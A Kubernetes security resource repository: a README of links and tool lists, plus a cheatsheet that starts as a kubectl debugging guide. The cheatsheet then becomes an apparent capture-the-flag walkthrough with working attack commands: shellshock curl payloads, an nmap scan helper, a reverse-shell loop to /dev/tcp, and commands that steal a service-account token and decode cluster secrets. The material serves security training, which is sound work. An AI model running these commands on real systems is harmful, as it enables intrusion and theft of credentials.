├── LICENSE ├── README.md ├── art ├── HackingKubernetes.png ├── HackingKubernetes0.jpg ├── kubernetes_arquitecture.png └── ports_kubernetes.png └── pdf ├── Learn by Hacking.zip └── k8s_cheatsheet.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Andrej Marinchenko 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |

12 |
13 | 14 | logo 15 | 16 | # HackingKubernetes 17 |
18 | 19 | HackingKubernetes - is a valuable resource and a leading container management system in development pipelines across 20 | the world, but it’s not exempt from malicious attacks. Using Kubernetes requires a deep understanding of Kubernetes’ 21 | environment—including the different vulnerabilities you can be exposed to while creating, deploying, or running 22 | applications in your clusters. 23 | 24 | Since your Kubernetes cluster is likely one of your most valuable cloud resources, it needs to be protected. 25 | Kubernetes’ security addresses the safety of your cloud, application clusters, containers, apps and code. Although 26 | Kubernetes provides inherent security advantages, bolstering your defensive tactics is crucial to protecting your 27 | system against hackers and other cybersecurity threats. 28 | 29 | ## Intro 30 | - [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/) 31 | - [Kubernetes adoption, security, and market trends report](https://www.redhat.com/en/resources/kubernetes-adoption-security-market-trends-overview) 32 | 33 | 34 | ### Official documentation kubernetes 35 | - [Kubernetes Documentation](https://kubernetes.io/docs/home/) 36 | - [Github repo kubernetes](https://github.com/kubernetes/kubernetes/) 37 | - [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/) 38 | - [Security kubernetes](https://kubernetes.io/docs/concepts/security/) 39 | - [Docker Engine security](https://docs.docker.com/engine/security/) 40 | - 41 | 42 | ### Security resources 43 | - [Container Security Site](https://www.container-security.site/) 44 | - [KubeCon + CloudNativeCon Europe 2024](https://www.youtube.com/playlist?list=PLj6h78yzYM2N8nw1YcqqKveySH6_0VnI0) 45 | - [Cloud native computing foundation](https://www.cncf.io/) 46 | 47 | ### Intro from TryHackMe (free) 48 | - [Intro to IaC](https://tryhackme.com/r/room/introtoiac) 49 | - [Intro to IaC with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Intro%20to%20IaC.md) 50 | - [Microservices Architectures](https://tryhackme.com/r/room/microservicearchitectures) 51 | - [Microservices Architectures with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Microservices%20Architectures.md) 52 | - [Kubernetes for Everyone](https://tryhackme.com/r/room/kubernetesforyouly) 53 | - [Kubernetes for Everyone with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Kubernetes%20for%20Everyone.md) 54 | - [K8s Best Security Practices](https://tryhackme.com/r/room/k8sbestsecuritypractices) 55 | - [K8s Best Security Practices with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/K8s%20Best%20Security%20Practices.md) 56 | - [Cluster Hardening](https://tryhackme.com/r/room/clusterhardening) 57 | - [Cluster Hardening with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Cluster%20Hardening.md) 58 | - [Frank & Herby make an app](https://tryhackme.com/r/room/frankandherby) 59 | - [Frank & Herby make an app with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Frank%20%26%20Herby%20make%20an%20app.md) 60 | 61 | ### Intro from vmware 62 | - [What is Kubernetes?](https://www.vmware.com/topics/kubernetes) 63 | - [What is DevSecOps?](https://tanzu.vmware.com/devsecops) 64 | - [What is Kubernetes Architecture?](https://www.vmware.com/topics/kubernetes-architecture) 65 | - [What are Kubernetes Services?](https://www.vmware.com/topics/kubernetes-services) 66 | - [What is Kubernetes Security?](https://www.vmware.com/topics/kubernetes-security) 67 | - [What is Kubernetes Networking?](https://www.vmware.com/topics/kubernetes-networking) 68 | - [What are Kubernetes Clusters vs. Nodes vs. Pods vs. Containers vs. Containerized Applications?](https://www.vmware.com/topics/components-kubernetes) 69 | - [What are Kubernetes Pods?](https://www.vmware.com/topics/kubernetes-pods) 70 | 71 | ### Intro fromm yarsalabs 72 | - [A Deep Dive Into Kubernetes Pods](https://blog.yarsalabs.com/a-deep-dive-into-kubernetes-pods/) 73 | - [Installing the Components required for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part1/) 74 | - [TLS Certificates Management for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part2/) 75 | - [ETCD Server Setup for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part3/) 76 | - [Generating Kubernetes Configuration Files for Authentication](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part4/) 77 | - [Creating the Kubernetes Control Plane](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part5/) 78 | 79 | 80 | ### Cheatsheets 81 | 82 | - [quick reference](https://kubernetes.io/docs/reference/kubectl/quick-reference/) 83 | - [k8s_cheatsheet.md](https://github.com/BEPb/HackingKubernetes/blob/master/pdf/k8s_cheatsheet.md) 84 | - [k8s-cheat-sheet](https://encore.dev/resources/k8s-cheat-sheet) 85 | - [kubernetes-cheat-sheet](https://www.mirantis.com/blog/kubernetes-cheat-sheet) 86 | - [Kubernetes Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data) 87 | 88 | arquitecture 89 | ports 90 | 91 | ### Atricles How to Hack Kubernetes 92 | - [How to Hack Kubernetes (and How to Protect It)](https://goteleport.com/blog/how-to-hack-kubernetes/) 93 | - [Securing Kubernetes Clusters by Eliminating Risky Permissions](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions) 94 | - [Kubernetes Pentest Methodology Part 1](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1) 95 | - [Kubernetes Pentest Methodology Part 2](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2) 96 | - [Kubernetes Pentest Methodology Part 3](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3) 97 | - [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod) 98 | - [Kubernetes Pod Escape Using Log Mounts](https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/) 99 | - [The Route to Root: Container Escape Using Kernel Exploitation](https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation) 100 | - [Attacking Kubernetes clusters using the Kubelet API](https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca) 101 | - [Threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/) 102 | - [Secure containerized environments with updated threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/) 103 | - [Introduction to GKE Kubelet TLS Bootstrap Privilege Escalation](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/) 104 | - [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation) 105 | - [Bad Pods github](https://github.com/BishopFox/badPods) 106 | - [Hacking Kubelet on Google Kubernetes Engine](https://www.4armed.com/blog/hacking-kubelet-on-gke/) 107 | 108 | ### PDF 109 | - [Learn by Hacking](https://github.com/calinah/learn-by-hacking-kccn/blob/master/Learn%20by%20Hacking.pdf) 110 | - 111 | 112 | ### Kubernetes Security 113 | - [Kubernetes Security Best Practices everyone must follow](https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow) 114 | - [Securing a Cluster](https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster) 115 | - [Security Best Practices for Kubernetes Deployment](https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment) 116 | - [Kubernetes Security Best Practices](https://phoenixnap.com/kb/kubernetes-security-best-practices) 117 | - [Kubernetes Security 101: Risks and 29 Best Practices](https://www.stackrox.com/post/2020/05/kubernetes-security-101) 118 | - [15 Kubernetes security best practice to secure your cluster](https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster) 119 | - [The Ultimate Guide to Kubernetes Security](https://neuvector.com/container-security/kubernetes-security-guide) 120 | - [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked) 121 | - [12 Kubernetes configuration best practices](https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server) 122 | - [A Practical Guide to Kubernetes Logging](https://logz.io/blog/a-practical-guide-to-kubernetes-logging) 123 | - [Kubernetes Web UI (Dashboard)](https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard) 124 | - [OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION](https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud) 125 | - [Introducing Policy As Code: The Open Policy Agent (OPA) ](https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa) 126 | - [What service mesh provides](https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf) 127 | - [Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1](https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1) 128 | - [Open Policy Agent: What Is OPA and How It Works (Examples)](https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works) 129 | - [Send Kubernetes Metrics To Kibana and Elasticsearch](https://logit.io/sources/configure/kubernetes/) 130 | - [Kubernetes Security Checklist](https://kubernetes.io/docs/concepts/security/security-checklist/) 131 | 132 |

Container & Kubernetes Security Tools

This is a list of open source tools which help with areas related to Container security. Some of the tools in this list don’t fit neatly into a specific category or categories, so they’re listed with the closest option.

Container Attack Surface Assessment & Breakout Tools

Useful tools to run inside a container to assess the sandbox that’s in use, and exploit some common breakout issues.

Container Vulnerability Scanning Tools

IaC Scanning Tools that cover container formats

Docker Security Tools

Container Runtime Security Tools

Container Registry Tools

Container Image Tools

Kubernetes Tools

RBAC Assessment Tools

Kubernetes Security Auditing Tools

Kubernetes Penetration Testing Tools

Kubelet Tools

etcd Tools

Security Observability Tools

Training Tools

If you’re looking to practice with some of the tools here, in a safe environment, there are projects to help with that.

Kubernetes Honeypot projects

Kubernetes Security Improvement Tools

Deprecated/Unmaintained Tools

Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I’ve listed you here and you’re not deprecated just open an issue to move it back :)

133 | 134 | 135 | 136 | logo 137 | 138 | -------------------------------------------------------------------------------- /art/HackingKubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/HackingKubernetes.png -------------------------------------------------------------------------------- /art/HackingKubernetes0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/HackingKubernetes0.jpg -------------------------------------------------------------------------------- /art/kubernetes_arquitecture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/kubernetes_arquitecture.png -------------------------------------------------------------------------------- /art/ports_kubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/ports_kubernetes.png -------------------------------------------------------------------------------- /pdf/Learn by Hacking.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/pdf/Learn by Hacking.zip -------------------------------------------------------------------------------- /pdf/k8s_cheatsheet.md: -------------------------------------------------------------------------------- 1 | This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly. 2 | 3 | ## Pod & Container Introspection 4 | 5 | | Command | Description | 6 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 7 | | `kubectl get pods` | lists the current pods in the current namespace | 8 | | `kubectl get pods -w` | watches pods continuously | 9 | | `kubectl describe pod ` | describe pod | 10 | | `kubectl get rc` | list the replication controllers | 11 | | `kubectl get services` or `kubectl get svc` | list the services in the current namespace | 12 | | `kubectl describe service ` or `kubectl describe svc ` | describe service | 13 | | `kubectl delete pod ` | delete pod | 14 | | `kubectl get pods -o wide –w` | watch pods continuously and show
info such as IP addresses & nodes provisioned on | 15 | 16 | ## Cluster Introspection 17 | 18 | | Command | Description | 19 | | :----------------------------- | :----------------------------------------------------------- | 20 | | `kubectl version` | get version info | 21 | | `kubectl cluster-info` | get cluster info | 22 | | `kubectl config view` | get cluster config | 23 | | `kubectl describe node ` | output info about a node | 24 | | `kubectl get nodes –w` | watch nodes continuously | 25 | | `kubectl get nodes -o wide` | gives a detailed view of nodes - including internal & external IP address | 26 | 27 | ## Debugging 28 | 29 | | Command | Description | 30 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 31 | | `kubectl exec -ti [-c ]` | execute command on pod , optionally on a
given container | 32 | | `klog [-c ]` or
`kubectl logs -f [-c `] | get logs of a given pod or optionally container | 33 | | | | 34 | | | | 35 | 36 | ## Networking 37 | 38 | | Command | Description | 39 | | ------------------------------------------------------------ | ----------------------------------------- | 40 | | `kubectl exec -ti -- /bin/sh -c "curl -v
telnet://:"` | testing TCP connectivity between services | 41 | | | | 42 | | | | 43 | | | | 44 | 45 | ## Other resources 46 | 47 | - check whether an action is allowed in your Kubernetes cluster 48 | 49 | Use `amicontained` to find out what container runtime you're using as well as what capabilities the your container has. 50 | 51 | ``` 52 | # Export the sha256sum for verification. 53 | $ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21" 54 | 55 | # Download and check the sha256sum. 56 | $ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \ 57 | && echo "${AMICONTAINED_SHA256} /usr/local/bin/amicontained" | sha256sum -c - \ 58 | && chmod a+x "/usr/local/bin/amicontained" 59 | 60 | $ echo "amicontained installed!" 61 | 62 | # Run it! 63 | $ amicontained -h 64 | ``` 65 | 66 | Add these functions to your environment so that you can scan for open ports 67 | 68 | ``` sudo apt-get update 69 | sudo apt-get install nmap 70 | nmap-kube () 71 | { 72 | nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}" 73 | } 74 | nmap-kube-discover () { 75 | local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,'); 76 | local SERVER_RANGES=" "; 77 | SERVER_RANGES+="10.0.0.1 "; 78 | SERVER_RANGES+="10.0.1.* "; 79 | SERVER_RANGES+="10.*.0-1.* "; 80 | nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}" 81 | } 82 | nmap-kube-discover 83 | ``` 84 | 85 | Part 1: compromise via shellshock 86 | 87 | Useful commands for finding open ports: 88 | 89 | ``` 90 | command nmap -Pn -T4 -F --open 91 | # scanning every port, more is open 92 | command nmap -Pn -T4 --open -p 0-65535 93 | command nmap -Pn -T4 --open -p 30081 94 | ``` 95 | 96 | 1. Check shellshock 97 | 98 | ``` 99 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"' 100 | ``` 101 | 102 | 2. create a control server to use as a reverse shell endpoint 103 | 104 | this requires any node with a public IP (a digital ocean server would do) 105 | 106 | ``` 107 | # replace `controlplane` with a host that you can SSH to 108 | ssh controlplane ip a 109 | 110 | # replace 1234 with a port that is routable on the host you have SSH'd into 111 | while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done 112 | ``` 113 | 114 | 3. shellshock in 115 | 116 | 117 | 118 | ``` 119 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"' 120 | ``` 121 | 122 | Hardcore version: 123 | 124 | ``` 125 | while :; do curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp//1234 0>&1; sleep 1; done"'; done 126 | ``` 127 | 128 | Part 2: 129 | 130 | Kubectl SA: steal secret with ssh password in (flag) 131 | 132 | ### Steps 133 | 134 | 1. on the control server, or via individual shellshock commands: 135 | 136 | Search for secrets: 137 | 138 | ``` 139 | df -h 140 | cat /run/secrets/kubernetes.io/serviceaccount/token; echo 141 | 142 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes 143 | 144 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system 145 | ``` 146 | 147 | 2. pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system) 148 | 149 | ``` 150 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock 151 | ``` 152 | 153 | 3. we've found secrets, now decode them 154 | 155 | > first way requires manual base64 decode, second is a one-liner 156 | 157 | ``` 158 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock 159 | 160 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo 161 | ``` 162 | 163 | 4. find password for ssh server in flag 164 | 165 | 5. write password in local file to win (or just tell ControlPlane!) TODO(low): write test for this 166 | 167 | ``` 168 | echo 'What kind of plane is it?' > /tmp/flag 169 | ``` --------------------------------------------------------------------------------